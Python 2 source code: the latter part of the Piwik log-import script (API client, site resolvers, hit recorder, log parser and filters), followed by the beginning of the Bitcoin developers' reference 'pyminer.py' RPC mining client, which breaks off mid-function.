def set_time_start(self):
self.time_start = time.time()
def set_time_stop(self):
self.time_stop = time.time()
def _compute_speed(self, value, start, end):
delta_time = end - start
if value == 0:
return 0
if delta_time == 0:
return 'very high!'
else:
return value / delta_time
def _round_value(self, value, base=100):
return round(value * base) / base
def _indent_text(self, lines, level=1):
"""
Return an indented text. 'lines' can be a list of lines or a single
line (as a string). One level of indentation is 4 spaces.
"""
prefix = ' ' * (4 * level)
if isinstance(lines, basestring):
return prefix + lines
else:
return '\n'.join(
prefix + line
for line in lines
)
def print_summary(self):
print '''
Logs import summary
-------------------
%(count_lines_recorded)d requests imported successfully
%(count_lines_downloads)d requests were downloads
%(total_lines_ignored)d requests ignored:
%(count_lines_skipped_http_errors)d HTTP errors
%(count_lines_skipped_http_redirects)d HTTP redirects
%(count_lines_invalid)d invalid log lines
%(count_lines_no_site)d requests did not match any known site
%(count_lines_hostname_skipped)d requests did not match any --hostname
%(count_lines_skipped_user_agent)d requests done by bots, search engines...
%(count_lines_static)d requests to static resources (css, js, images, ico, ttf...)
%(count_lines_skipped_downloads)d requests to file downloads did not match any --download-extensions
Website import summary
----------------------
%(count_lines_recorded)d requests imported to %(total_sites)d sites
%(total_sites_existing)d sites already existed
%(total_sites_created)d sites were created:
%(sites_created)s
%(total_sites_ignored)d distinct hostnames did not match any existing site:
%(sites_ignored)s
%(sites_ignored_tips)s
Performance summary
-------------------
Total time: %(total_time)d seconds
Requests imported per second: %(speed_recording)s requests per second
Processing your log data
------------------------
In order for your logs to be processed by Piwik, you may need to run the following command:
./console core:archive --force-all-websites --force-all-periods=315576000 --force-date-last-n=1000 --url='%(url)s'
''' % {
'count_lines_recorded': self.count_lines_recorded.value,
'count_lines_downloads': self.count_lines_downloads.value,
'total_lines_ignored': sum([
self.count_lines_invalid.value,
self.count_lines_skipped_user_agent.value,
self.count_lines_skipped_http_errors.value,
self.count_lines_skipped_http_redirects.value,
self.count_lines_static.value,
self.count_lines_skipped_downloads.value,
self.count_lines_no_site.value,
self.count_lines_hostname_skipped.value,
]),
'count_lines_invalid': self.count_lines_invalid.value,
'count_lines_skipped_user_agent': self.count_lines_skipped_user_agent.value,
'count_lines_skipped_http_errors': self.count_lines_skipped_http_errors.value,
'count_lines_skipped_http_redirects': self.count_lines_skipped_http_redirects.value,
'count_lines_static': self.count_lines_static.value,
'count_lines_skipped_downloads': self.count_lines_skipped_downloads.value,
'count_lines_no_site': self.count_lines_no_site.value,
'count_lines_hostname_skipped': self.count_lines_hostname_skipped.value,
'total_sites': len(self.piwik_sites),
'total_sites_existing': len(self.piwik_sites - set(site_id for hostname, site_id in self.piwik_sites_created)),
'total_sites_created': len(self.piwik_sites_created),
'sites_created': self._indent_text(
['%s (ID: %d)' % (hostname, site_id) for hostname, site_id in self.piwik_sites_created],
level=3,
),
'total_sites_ignored': len(self.piwik_sites_ignored),
'sites_ignored': self._indent_text(
self.piwik_sites_ignored, level=3,
),
'sites_ignored_tips': '''
TIPs:
- if one of these hosts is an alias host for one of the websites
in Piwik, you can add this host as an "Alias URL" in Settings > Websites.
- use --add-sites-new-hosts if you wish to automatically create
one website for each of these hosts in Piwik rather than discarding
these requests.
- use --idsite-fallback to force all these log lines with a new hostname
to be recorded in a specific idsite (for example for troubleshooting/visualizing the data)
- use --idsite to force all lines in the specified log files
to be all recorded in the specified idsite
- or you can also manually create a new Website in Piwik with the URL set to this hostname
''' if self.piwik_sites_ignored else '',
'total_time': self.time_stop - self.time_start,
'speed_recording': self._round_value(self._compute_speed(
self.count_lines_recorded.value,
self.time_start, self.time_stop,
)),
'url': config.options.piwik_url
}
##
## The monitor is a thread that prints a short summary each second.
##
def _monitor(self):
latest_total_recorded = 0
while not self.monitor_stop:
current_total = stats.count_lines_recorded.value
time_elapsed = time.time() - self.time_start
print '%d lines parsed, %d lines recorded, %d records/sec (avg), %d records/sec (current)' % (
stats.count_lines_parsed.value,
current_total,
current_total / time_elapsed if time_elapsed != 0 else 0,
(current_total - latest_total_recorded) / config.options.show_progress_delay,
)
latest_total_recorded = current_total
time.sleep(config.options.show_progress_delay)
def start_monitor(self):
t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def stop_monitor(self):
self.monitor_stop = True
class Piwik(object):
"""
Make requests to Piwik.
"""
class Error(Exception):
def __init__(self, message, code = None):
super(Exception, self).__init__(message)
self.code = code
class RedirectHandlerWithLogging(urllib2.HTTPRedirectHandler):
"""
Special implementation of HTTPRedirectHandler that logs redirects in debug mode
to help users debug system issues.
"""
def redirect_request(self, req, fp, code, msg, hdrs, newurl):
logging.debug("Request redirected (code: %s) to '%s'" % (code, newurl))
return urllib2.HTTPRedirectHandler.redirect_request(self, req, fp, code, msg, hdrs, newurl)
@staticmethod
def _call(path, args, headers=None, url=None, data=None):
"""
Make a request to the Piwik site. It is up to the caller to format
arguments, to embed authentication, etc.
"""
if url is None:
url = config.options.piwik_url
headers = headers or {}
if data is None:
# If Content-Type isn't defined, PHP does not parse the request's body.
headers['Content-type'] = 'application/x-www-form-urlencoded'
data = urllib.urlencode(args)
elif not isinstance(data, basestring) and headers['Content-type'] == 'application/json':
data = json.dumps(data)
headers['User-Agent'] = 'Piwik/LogImport'
request = urllib2.Request(url + path, data, headers)
opener = urllib2.build_opener(Piwik.RedirectHandlerWithLogging())
response = opener.open(request, timeout = config.options.request_timeout)
result = response.read()
response.close()
return result
@staticmethod
def _call_api(method, **kwargs):
"""
Make a request to the Piwik API taking care of authentication, body
formatting, etc.
"""
args = {
'module' : 'API',
'format' : 'json2',
'method' : method,
}
# token_auth, by default, is taken from config.
token_auth = kwargs.pop('_token_auth', None)
if token_auth is None:
token_auth = config.options.piwik_token_auth
if token_auth:
args['token_auth'] = token_auth
url = kwargs.pop('_url', None)
if kwargs:
args.update(kwargs)
# Convert lists into appropriate format.
# See: http://developer.piwik.org/api-reference/reporting-api#passing-an-array-of-data-as-a-parameter
# Warning: we have to pass the parameters in order: foo[0], foo[1], foo[2]
# and not foo[1], foo[0], foo[2] (it will break Piwik otherwise.)
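# Illustrative example (not in the original comments): a call passing
# urls=['http://a.example', 'http://b.example'] is flattened below into
# [('urls[0]', 'http://a.example'), ('urls[1]', 'http://b.example')].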
final_args = []
for key, value in args.iteritems():
if isinstance(value, (list, tuple)):
for index, obj in enumerate(value):
final_args.append(('%s[%d]' % (key, index), obj))
else:
final_args.append((key, value))
res = Piwik._call('/', final_args, url=url)
try:
return json.loads(res)
except ValueError:
raise urllib2.URLError('Piwik returned an invalid response: ' + res)
@staticmethod
def _call_wrapper(func, expected_response, on_failure, *args, **kwargs):
"""
Try to make requests to Piwik, retrying up to config.options.max_attempts times on failure.
"""
errors = 0
while True:
try:
response = func(*args, **kwargs)
if expected_response is not None and response != expected_response:
if on_failure is not None:
error_message = on_failure(response, kwargs.get('data'))
else:
error_message = "didn't receive the expected response. Response was %s " % response
raise urllib2.URLError(error_message)
return response
except (urllib2.URLError, httplib.HTTPException, ValueError, socket.timeout), e:
logging.info('Error when connecting to Piwik: %s', e)
code = None
if isinstance(e, urllib2.HTTPError):
# See Python issue 13211.
message = 'HTTP Error %s %s' % (e.code, e.msg)
code = e.code
elif isinstance(e, urllib2.URLError):
message = e.reason
else:
message = str(e)
# decorate message w/ HTTP response, if it can be retrieved
if hasattr(e, 'read'):
message = message + ", response: " + e.read()
errors += 1
if errors == config.options.max_attempts:
logging.info("Max number of attempts reached, server is unreachable!")
raise Piwik.Error(message, code)
else:
logging.info("Retrying request, attempt number %d" % (errors + 1))
time.sleep(config.options.delay_after_failure)
@classmethod
def call(cls, path, args, expected_content=None, headers=None, data=None, on_failure=None):
return cls._call_wrapper(cls._call, expected_content, on_failure, path, args, headers,
data=data)
@classmethod
def call_api(cls, method, **kwargs):
return cls._call_wrapper(cls._call_api, None, None, method, **kwargs)
##
## Resolvers.
##
## A resolver is a class that turns a hostname into a Piwik site ID.
##
class StaticResolver(object):
"""
Always return the same site ID, specified in the configuration.
"""
def __init__(self, site_id):
self.site_id = site_id
# Go get the main URL
site = piwik.call_api(
'SitesManager.getSiteFromId', idSite=self.site_id
)
if site.get('result') == 'error':
fatal_error(
"cannot get the main URL of this site: %s" % site.get('message')
)
self._main_url = site['main_url']
stats.piwik_sites.add(self.site_id)
def resolve(self, hit):
return (self.site_id, self._main_url)
def check_format(self, format):
pass
class DynamicResolver(object):
"""
Use Piwik API to determine the site ID.
"""
_add_site_lock = threading.Lock()
def __init__(self):
self._cache = {}
if config.options.replay_tracking:
# get existing sites
self._cache['sites'] = piwik.call_api('SitesManager.getAllSites')
def _get_site_id_from_hit_host(self, hit):
main_url = 'http://' + hit.host
return piwik.call_api(
'SitesManager.getSitesIdFromSiteUrl',
url=main_url,
)
def _add_site(self, hit):
main_url = 'http://' + hit.host
DynamicResolver._add_site_lock.acquire()
try:
# After we obtain the lock, make sure the site hasn't already been created.
res = self._get_site_id_from_hit_host(hit)
if res:
return res[0]['idsite']
# The site doesn't exist.
logging.debug('No Piwik site found for the hostname: %s', hit.host)
if config.options.site_id_fallback is not None:
logging.debug('Using default site for hostname: %s', hit.host)
return config.options.site_id_fallback
elif config.options.add_sites_new_hosts:
if config.options.dry_run:
# Let's just return a fake ID.
return 0
logging.debug('Creating a Piwik site for hostname %s', hit.host)
result = piwik.call_api(
'SitesManager.addSite',
siteName=hit.host,
urls=[main_url],
)
if result.get('result') == 'error':
logging.error("Couldn't create a Piwik site for host %s: %s",
hit.host, result.get('message'),
)
return None
else:
site_id = result['value']
stats.piwik_sites_created.append((hit.host, site_id))
return site_id
else:
# The site doesn't exist, we don't want to create new sites and
# there's no default site ID. We thus have to ignore this hit.
return None
finally:
DynamicResolver._add_site_lock.release()
def _resolve(self, hit):
res = self._get_site_id_from_hit_host(hit)
if res:
# The site already exists.
site_id = res[0]['idsite']
else:
site_id = self._add_site(hit)
if site_id is not None:
stats.piwik_sites.add(site_id)
return site_id
def _resolve_when_replay_tracking(self, hit):
"""
If the site ID parsed from the request is found in _cache['sites'], return
(site ID, main_url); otherwise return a (None, None) tuple.
"""
site_id = hit.args['idsite']
if site_id in self._cache['sites']:
stats.piwik_sites.add(site_id)
return (site_id, self._cache['sites'][site_id]['main_url'])
else:
return (None, None)
def _resolve_by_host(self, hit):
"""
Returns the site ID and site URL for a hit based on the hostname.
"""
try:
site_id = self._cache[hit.host]
except KeyError:
logging.debug(
'Site ID for hostname %s not in cache', hit.host
)
site_id = self._resolve(hit)
logging.debug('Site ID for hostname %s: %s', hit.host, site_id)
self._cache[hit.host] = site_id
return (site_id, 'http://' + hit.host)
def resolve(self, hit):
"""
Return the site ID from the cache if found, otherwise call _resolve.
If replay_tracking option is enabled, call _resolve_when_replay_tracking.
"""
if config.options.replay_tracking:
# In replay mode we only consider piwik.php requests, which carry the site ID and don't need the hostname to be resolved
return self._resolve_when_replay_tracking(hit)
else:
return self._resolve_by_host(hit)
def check_format(self, format):
if config.options.replay_tracking:
pass
elif format.regex is not None and 'host' not in format.regex.groupindex and not config.options.log_hostname:
fatal_error(
"the selected log format doesn't include the hostname: you must "
"specify the Piwik site ID with the --idsite argument"
)
class Recorder(object):
"""
A Recorder fetches hits from the Queue and inserts them into Piwik using
the API.
"""
recorders = []
def __init__(self):
self.queue = Queue.Queue(maxsize=2)
# if bulk tracking disabled, make sure we can store hits outside of the Queue
if not config.options.use_bulk_tracking:
self.unrecorded_hits = []
@classmethod
def launch(cls, recorder_count):
"""
Launch a bunch of Recorder objects in a separate thread.
"""
for i in xrange(recorder_count):
recorder = Recorder()
cls.recorders.append(recorder)
run = recorder._run_bulk if config.options.use_bulk_tracking else recorder._run_single
t = threading.Thread(target=run)
t.daemon = True
t.start()
logging.debug('Launched recorder')
@classmethod
def add_hits(cls, all_hits):
"""
Add a set of hits to the recorders queue.
"""
# Organize hits so that one client IP will always use the same queue.
# We have to do this so visits from the same IP will be added in the right order.
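# Illustrative example (added): with 4 recorders, a hit whose visitor id
# hashes to 10 is appended to queue 10 % 4 == 2, so all hits from that
# visitor are replayed in order by the same recorder thread.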
hits_by_client = [[] for r in cls.recorders]
for hit in all_hits:
hits_by_client[hit.get_visitor_id_hash() % len(cls.recorders)].append(hit)
for i, recorder in enumerate(cls.recorders):
recorder.queue.put(hits_by_client[i])
@classmethod
def wait_empty(cls):
"""
Wait until all recorders have an empty queue.
"""
for recorder in cls.recorders:
recorder._wait_empty()
def _run_bulk(self):
while True:
hits = self.queue.get()
if len(hits) > 0:
try:
self._record_hits(hits)
except Piwik.Error, e:
fatal_error(e, hits[0].filename, hits[0].lineno) # approximate location of error
self.queue.task_done()
def _run_single(self):
while True:
if config.options.force_one_action_interval != False:
time.sleep(config.options.force_one_action_interval)
if len(self.unrecorded_hits) > 0:
hit = self.unrecorded_hits.pop(0)
try:
self._record_hits([hit])
except Piwik.Error, e:
fatal_error(e, hit.filename, hit.lineno)
else:
self.unrecorded_hits = self.queue.get()
self.queue.task_done()
def _wait_empty(self):
"""
Wait until the queue is empty.
"""
while True:
if self.queue.empty():
# We still have to wait for the last queue item being processed
# (queue.empty() returns True before queue.task_done() is
# called).
self.queue.join()
return
time.sleep(1)
def date_to_piwik(self, date):
date, time = date.isoformat(sep=' ').split()
return '%s %s' % (date, time.replace('-', ':'))
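# Illustrative example (added): datetime(2017, 1, 2, 3, 4, 5) becomes
# '2017-01-02 03:04:05', the value sent as the 'cdt' tracking parameter below.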
def _get_hit_args(self, hit):
"""
Returns the args used in tracking a hit, without the token_auth.
"""
site_id, main_url = resolver.resolve(hit)
if site_id is None:
# This hit doesn't match any known Piwik site.
if config.options.replay_tracking:
stats.piwik_sites_ignored.add('unrecognized site ID %s' % hit.args.get('idsite'))
else:
stats.piwik_sites_ignored.add(hit.host)
stats.count_lines_no_site.increment()
return
stats.dates_recorded.add(hit.date.date())
path = hit.path
if hit.query_string and not config.options.strip_query_string:
path += config.options.query_string_delimiter + hit.query_string
# only prepend main url if it's a path
url = (main_url if path.startswith('/') else '') + path[:1024]
# handle custom variables before generating args dict
if config.options.enable_bots:
if hit.is_robot:
hit.add_visit_custom_var("Bot", hit.user_agent)
else:
hit.add_visit_custom_var("Not-Bot", hit.user_agent)
hit.add_page_custom_var("HTTP-code", hit.status)
args = {
'rec': '1',
'apiv': '1',
'url': url.encode('utf8'),
'urlref': hit.referrer[:1024].encode('utf8'),
'cip': hit.ip,
'cdt': self.date_to_piwik(hit.date),
'idsite': site_id,
'dp': '0' if config.options.reverse_dns else '1',
'ua': hit.user_agent.encode('utf8')
}
if config.options.replay_tracking:
# prevent the request from being force recorded when the replay-tracking option is used
args['rec'] = '0'
args.update(hit.args)
if hit.is_download:
args['download'] = args['url']
if config.options.enable_bots:
args['bots'] = '1'
if hit.is_error or hit.is_redirect:
args['action_name'] = '%s%sURL = %s%s' % (
hit.status,
config.options.title_category_delimiter,
urllib.quote(args['url'], ''),
("%sFrom = %s" % (
config.options.title_category_delimiter,
urllib.quote(args['urlref'], '')
) if args['urlref'] != '' else '')
)
if hit.generation_time_milli > 0:
args['gt_ms'] = int(hit.generation_time_milli)
if hit.event_category and hit.event_action:
args['e_c'] = hit.event_category
args['e_a'] = hit.event_action
if hit.event_name:
args['e_n'] = hit.event_name
if hit.length:
args['bw_bytes'] = hit.length
# convert custom variable args to JSON
if 'cvar' in args and not isinstance(args['cvar'], basestring):
args['cvar'] = json.dumps(args['cvar'])
if '_cvar' in args and not isinstance(args['_cvar'], basestring):
args['_cvar'] = json.dumps(args['_cvar'])
return args
def _record_hits(self, hits):
"""
Inserts several hits into Piwik.
"""
if not config.options.dry_run:
data = {
'token_auth': config.options.piwik_token_auth,
'requests': [self._get_hit_args(hit) for hit in hits]
}
try:
piwik.call(
'/piwik.php', args={},
expected_content=None,
headers={'Content-type': 'application/json'},
data=data,
on_failure=self._on_tracking_failure
)
except Piwik.Error, e:
# if the server returned 400 code, BulkTracking may not be enabled
if e.code == 400:
fatal_error("Server returned status 400 (Bad Request).\nIs the BulkTracking plugin disabled?")
raise
stats.count_lines_recorded.advance(len(hits))
def _is_json(self, result):
try:
json.loads(result)
return True
except ValueError, e:
return False
def _on_tracking_failure(self, response, data):
"""
Removes the successfully tracked hits from the request payload so
they are not logged twice.
"""
try:
response = json.loads(response)
except:
# the response should be in JSON, but in case it can't be parsed just try another attempt
logging.debug("cannot parse tracker response, should be valid JSON")
return response
# remove the successfully tracked hits from payload
tracked = response['tracked']
data['requests'] = data['requests'][tracked:]
return response['message']
class Hit(object):
"""
A simple container for the fields parsed from one log line.
"""
def __init__(self, **kwargs):
for key, value in kwargs.iteritems():
setattr(self, key, value)
super(Hit, self).__init__()
if config.options.force_lowercase_path:
self.full_path = self.full_path.lower()
def get_visitor_id_hash(self):
visitor_id = self.ip
if config.options.replay_tracking:
for param_name_to_use in ['uid', 'cid', '_id', 'cip']:
if param_name_to_use in self.args:
visitor_id = self.args[param_name_to_use]
break
return abs(hash(visitor_id))
def add_page_custom_var(self, key, value):
"""
Adds a page custom variable to this Hit.
"""
self._add_custom_var(key, value, 'cvar')
def add_visit_custom_var(self, key, value):
"""
Adds a visit custom variable to this Hit.
"""
self._add_custom_var(key, value, '_cvar')
def _add_custom_var(self, key, value, api_arg_name):
if api_arg_name not in self.args:
self.args[api_arg_name] = {}
if isinstance(self.args[api_arg_name], basestring):
logging.debug("Ignoring custom %s variable addition [ %s = %s ], custom var already set to string." % (api_arg_name, key, value))
return
index = len(self.args[api_arg_name]) + 1
self.args[api_arg_name][index] = [key, value]
class Parser(object):
"""
The Parser parses the lines in a specified file and inserts them into
a Queue.
"""
def __init__(self):
self.check_methods = [method for name, method
in inspect.getmembers(self, predicate=inspect.ismethod)
if name.startswith('check_')]
## All check_* methods are called for each hit and must return True if the
## hit can be imported, False otherwise.
def check_hostname(self, hit):
# Check against config.hostnames.
if not hasattr(hit, 'host') or not config.options.hostnames:
return True
# Accept the hostname only if it matches one pattern in the list.
result = any(
fnmatch.fnmatch(hit.host, pattern)
for pattern in config.options.hostnames
)
if not result:
stats.count_lines_hostname_skipped.increment()
return result
def check_static(self, hit):
if hit.extension in STATIC_EXTENSIONS:
if config.options.enable_static:
hit.is_download = True
return True
else:
stats.count_lines_static.increment()
return False
return True
def check_download(self, hit):
if hit.extension in config.options.download_extensions:
stats.count_lines_downloads.increment()
hit.is_download = True
return True
# the file is not in the white-listed downloads;
# if it's a known download file, we shall skip it
elif hit.extension in DOWNLOAD_EXTENSIONS:
stats.count_lines_skipped_downloads.increment()
return False
return True
def check_user_agent(self, hit):
user_agent = hit.user_agent.lower()
for s in itertools.chain(EXCLUDED_USER_AGENTS, config.options.excluded_useragents):
if s in user_agent:
if config.options.enable_bots:
hit.is_robot = True
return True
else:
stats.count_lines_skipped_user_agent.increment()
return False
return True
def check_http_error(self, hit):
if hit.status[0] in ('4', '5'):
if config.options.replay_tracking:
# process error logs for replay tracking, since we don't care if piwik returned an error the first time
return True
elif config.options.enable_http_errors:
hit.is_error = True
return True
else:
stats.count_lines_skipped_http_errors.increment()
return False
return True
def check_http_redirect(self, hit):
if hit.status[0] == '3' and hit.status != '304':
if config.options.enable_http_redirects:
hit.is_redirect = True
return True
else:
stats.count_lines_skipped_http_redirects.increment()
return False
return True
def check_path(self, hit):
for excluded_path in config.options.excluded_paths:
if fnmatch.fnmatch(hit.path, excluded_path):
return False
# By default, all paths are included.
if config.options.included_paths:
for included_path in config.options.included_paths:
if fnmatch.fnmatch(hit.path, included_path):
return True
return False
return True
@staticmethod
def check_format(lineOrFile):
format = False
format_groups = 0
for name, candidate_format in FORMATS.iteritems():
logging.debug("Check format %s", name)
match = None
try:
if isinstance(lineOrFile, basestring):
match = candidate_format.check_format_line(lineOrFile)
else:
match = candidate_format.check_format(lineOrFile)
except Exception, e:
logging.debug('Error in format checking: %s', traceback.format_exc())
pass
if match:
logging.debug('Format %s matches', name)
# compare format groups if this *BaseFormat has groups() method
try:
# if there's more info in this match, use this format
match_groups = len(match.groups())
logging.debug('Format match contains %d groups' % match_groups)
if format_groups < match_groups:
format = candidate_format
format_groups = match_groups
except AttributeError:
format = candidate_format
else:
logging.debug('Format %s does not match', name)
# if the format is W3cExtendedFormat, check if the logs are from IIS and if so, issue a warning if the
# --w3c-time-taken-millisecs option isn't set
if isinstance(format, W3cExtendedFormat):
format.check_for_iis_option()
return format
@staticmethod
def detect_format(file):
"""
Return the best matching format for this file, or None if none was found.
"""
logging.debug('Detecting the log format')
format = False
# check the format using the file (for formats like the W3cExtendedFormat one)
format = Parser.check_format(file)
# check the format using the first N lines (to avoid irregular ones)
lineno = 0
limit = 100000
while not format and lineno < limit:
line = file.readline()
if not line: # if at eof, don't keep looping
break
lineno = lineno + 1
logging.debug("Detecting format against line %i" % lineno)
format = Parser.check_format(line)
try:
file.seek(0)
except IOError:
pass
if not format:
fatal_error("cannot automatically determine the log format using the first %d lines of the log file. " % limit +
"\nMaybe try specifying the format with the --log-format-name command line argument." )
return
logging.debug('Format %s is the best match', format.name)
return format
def parse(self, filename):
"""
Parse the specified filename and insert hits in the queue.
"""
def invalid_line(line, reason):
stats.count_lines_invalid.increment()
if config.options.debug >= 2:
logging.debug('Invalid line detected (%s): %s' % (reason, line))
if filename == '-':
filename = '(stdin)'
file = sys.stdin
else:
if not os.path.exists(filename):
print >> sys.stderr, "\n=====> Warning: File %s does not exist <=====" % filename
return
else:
if filename.endswith('.bz2'):
open_func = bz2.BZ2File
elif filename.endswith('.gz'):
open_func = gzip.open
else:
open_func = open
file = open_func(filename, 'r')
if config.options.show_progress:
print 'Parsing log %s...' % filename
if config.format:
# The format was explicitly specified.
format = config.format
if isinstance(format, W3cExtendedFormat):
format.create_regex(file)
if format.regex is None:
return fatal_error(
"File is not in the correct format, is there a '#Fields:' line? "
"If not, use the --w3c-fields option."
)
else:
# If the file is empty, don't bother.
data = file.read(100)
if len(data.strip()) == 0:
return
try:
file.seek(0)
except IOError:
pass
format = self.detect_format(file)
if format is None:
return fatal_error(
'Cannot guess the logs format. Please give one using '
'either the --log-format-name or --log-format-regex option'
)
# Make sure the format is compatible with the resolver.
resolver.check_format(format)
if config.options.dump_log_regex:
logging.info("Using format '%s'." % format.name)
if format.regex:
logging.info("Regex being used: %s" % format.regex.pattern)
else:
logging.info("Format %s does not use a regex to parse log lines." % format.name)
logging.info("--dump-log-regex option used, aborting log import.")
os._exit(0)
hits = []
for lineno, line in enumerate(file):
try:
line = line.decode(config.options.encoding)
except UnicodeDecodeError:
invalid_line(line, 'invalid encoding')
continue
stats.count_lines_parsed.increment()
if stats.count_lines_parsed.value <= config.options.skip:
continue
match = format.match(line)
if not match:
invalid_line(line, 'line did not match')
continue
hit = Hit(
filename=filename,
lineno=lineno,
status=format.get('status'),
full_path=format.get('path'),
is_download=False,
is_robot=False,
is_error=False,
is_redirect=False,
args={},
)
if config.options.regex_group_to_page_cvars_map:
self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_page_cvars_map, True)
if config.options.regex_group_to_visit_cvars_map:
self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_visit_cvars_map, False)
if config.options.regex_groups_to_ignore:
format.remove_ignored_groups(config.options.regex_groups_to_ignore)
try:
hit.query_string = format.get('query_string')
hit.path = hit.full_path
except BaseFormatException:
hit.path, _, hit.query_string = hit.full_path.partition(config.options.query_string_delimiter)
# W3cExtendedFormat defaults to - when there is no query string, but we want an empty string
if hit.query_string == '-':
hit.query_string = ''
hit.extension = hit.path.rsplit('.')[-1].lower()
try:
hit.referrer = format.get('referrer')
if hit.referrer.startswith('"'):
hit.referrer = hit.referrer[1:-1]
except BaseFormatException:
hit.referrer = ''
if hit.referrer == '-':
hit.referrer = ''
try:
hit.user_agent = format.get('user_agent')
# in case a format parser included enclosing quotes, remove them so they are not
# sent to Piwik
if hit.user_agent.startswith('"'):
hit.user_agent = hit.user_agent[1:-1]
except BaseFormatException:
hit.user_agent = ''
hit.ip = format.get('ip')
try:
hit.length = int(format.get('length'))
except (ValueError, BaseFormatException):
# Some lines or formats don't have a length (e.g. 304 redirects, W3C logs)
hit.length = 0
try:
hit.generation_time_milli = float(format.get('generation_time_milli'))
except BaseFormatException:
try:
hit.generation_time_milli = float(format.get('generation_time_micro')) / 1000
except BaseFormatException:
try:
hit.generation_time_milli = float(format.get('generation_time_secs')) * 1000
except BaseFormatException:
hit.generation_time_milli = 0
if config.options.log_hostname:
hit.host = config.options.log_hostname
else:
try:
hit.host = format.get('host').lower().strip('.')
if hit.host.startswith('"'):
hit.host = hit.host[1:-1]
except BaseFormatException:
# Some formats have no host.
pass
# Add userid
try:
hit.userid = None
userid = format.get('userid')
if userid != '-':
hit.args['uid'] = hit.userid = userid
except:
pass
# add event info
try:
hit.event_category = hit.event_action = hit.event_name = None
hit.event_category = format.get('event_category')
hit.event_action = format.get('event_action')
hit.event_name = format.get('event_name')
if hit.event_name == '-':
hit.event_name = None
except:
pass
# Check if the hit must be excluded.
if not all((method(hit) for method in self.check_methods)):
continue
# Parse date.
# We parse it after calling check_methods as it's quite CPU hungry, and
# we want to avoid that cost for excluded hits.
date_string = format.get('date')
try:
hit.date = datetime.datetime.strptime(date_string, format.date_format)
except ValueError:
invalid_line(line, 'invalid date')
continue
# Parse timezone and subtract its value from the date
try:
timezone = float(format.get('timezone'))
except BaseFormatException:
timezone = 0
except ValueError:
invalid_line(line, 'invalid timezone')
continue
if timezone:
hit.date -= datetime.timedelta(hours=timezone/100)
if config.options.replay_tracking:
# we need a query string and we only consider requests with piwik.php
if not hit.query_string or not hit.path.lower().endswith(config.options.replay_tracking_expected_tracker_file):
invalid_line(line, 'no query string, or ' + hit.path.lower() + ' does not end with ' + config.options.replay_tracking_expected_tracker_file)
continue
query_arguments = urlparse.parse_qs(hit.query_string)
if not "idsite" in query_arguments:
invalid_line(line, 'missing idsite')
continue
try:
hit.args.update((k, v.pop().encode('raw_unicode_escape').decode(config.options.encoding)) for k, v in query_arguments.iteritems())
except UnicodeDecodeError:
invalid_line(line, 'invalid encoding')
continue
hits.append(hit)
if len(hits) >= config.options.recorder_max_payload_size * len(Recorder.recorders):
Recorder.add_hits(hits)
hits = []
# add last chunk of hits
if len(hits) > 0:
Recorder.add_hits(hits)
def _add_custom_vars_from_regex_groups(self, hit, format, groups, is_page_var):
for group_name, custom_var_name in groups.iteritems():
if group_name in format.get_all():
value = format.get(group_name)
# don't track the '-' empty placeholder value
if value == '-':
continue
if is_page_var:
hit.add_page_custom_var(custom_var_name, value)
else:
hit.add_visit_custom_var(custom_var_name, value)
def main():
"""
Start the importing process.
"""
stats.set_time_start()
if config.options.show_progress:
stats.start_monitor()
recorders = Recorder.launch(config.options.recorders)
try:
for filename in config.filenames:
parser.parse(filename)
Recorder.wait_empty()
except KeyboardInterrupt:
pass
stats.set_time_stop()
if config.options.show_progress:
stats.stop_monitor()
stats.print_summary()
def fatal_error(error, filename=None, lineno=None):
print >> sys.stderr, 'Fatal error: %s' % error
if filename and lineno is not None:
print >> sys.stderr, (
'You can restart the import of "%s" from the point it failed by '
'specifying --skip=%d on the command line.\n' % (filename, lineno)
)
os._exit(1)
if __name__ == '__main__':
try:
piwik = Piwik()
config = Configuration()
stats = Statistics()
resolver = config.get_resolver()
parser = Parser()
main()
sys.exit(0)
except KeyboardInterrupt:
pass
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
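# Illustrative example (added): bytereverse(0x12345678) == 0x78563412,
# i.e. the four bytes of the 32-bit word are reversed.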
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
